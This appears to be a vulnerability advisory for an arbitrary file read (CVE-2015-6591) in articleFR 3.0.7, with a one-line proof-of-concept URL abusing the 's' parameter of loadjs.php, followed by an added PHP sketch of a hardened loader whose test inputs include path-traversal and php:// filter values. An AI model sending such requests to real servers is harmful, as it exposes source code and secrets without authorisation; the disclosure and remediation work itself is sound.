# Exploit Title: articleFR any file read vulnerability in v3.0.7
# Date: 2015-09-06
# Vendor: Free Reprintables
# Exploit Author: cfreer & 0keeTeam
# Product web page: http://www.freereprintables.com
# Version: 3.0.7
# CVE : CVE-2015-6591

Details of the vulnerability are as follows:

Affected version: Version 3.0.7 and before.
Discover date: 2015/9/6
Tested on: Apache/2.4.7 (Win32)

===================================================

The vulnerable parameter is 's' (in articleFR\application\templates\amelia\loadjs.php). The value of 's' is passed directly into the file_get_contents function.

Proof of Concept:
=================================================================================================
http://127.0.0.1/articleFR/application/templates/amelia/loadjs.php?h=cfreer&r=0keeTeam&s=loadjs.php
=================================================================================================

referer: https://github.com/poc-lab/exp/blob/master/CVE-2015-6591
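
Added example, not articleFR's code and not part of the original advisory: a hardened loader for the flaw class described above, where a request parameter reaches file_get_contents. It assumes 's' is only ever meant to name JavaScript files in one directory; the function name load_js_asset and the demo directory layout are hypothetical.

```php
<?php
// Constructed sketch of the flaw class (not the project's source):
//   echo file_get_contents($_GET['s']);   // reads any file the web server can read

// Hypothetical hardened loader: serve only *.js files that resolve inside $baseDir.
function load_js_asset(string $baseDir, string $requested): ?string
{
    // Reject NUL bytes and stream wrappers such as php:// or http://.
    if (strpos($requested, "\0") !== false || strpos($requested, '://') !== false) {
        return null;
    }
    // realpath() collapses ../ and symlinks; it returns false for missing files.
    $base = realpath($baseDir);
    $full = realpath($baseDir . '/' . $requested);
    if ($base === false || $full === false || !is_file($full)) {
        return null;
    }
    // Check the extension on the resolved path, not on the raw parameter.
    if (strtolower(pathinfo($full, PATHINFO_EXTENSION)) !== 'js') {
        return null;
    }
    // The resolved path must still sit under the base directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    $data = file_get_contents($full);
    return $data === false ? null : $data;
}

// Constructed demo tree: one script under js/, PHP source and a .js file outside it.
$root = sys_get_temp_dir() . '/loadjs_demo_' . getmypid();
mkdir($root . '/js', 0700, true);
file_put_contents($root . '/js/app.js', "console.log('ok');");
file_put_contents($root . '/loadjs.php', "<?php /* server-side source */");
file_put_contents($root . '/outside.js', "/* outside the asset directory */");

$samples = ['app.js', 'loadjs.php', '../loadjs.php', '../outside.js',
            'php://filter/resource=app.js'];
foreach ($samples as $s) {
    $out = load_js_asset($root . '/js', $s);
    printf("%-30s %s\n", $s, $out === null ? 'rejected' : 'served');
}

// Remove the demo tree.
array_map('unlink', [$root . '/js/app.js', $root . '/loadjs.php', $root . '/outside.js']);
rmdir($root . '/js');
rmdir($root);
```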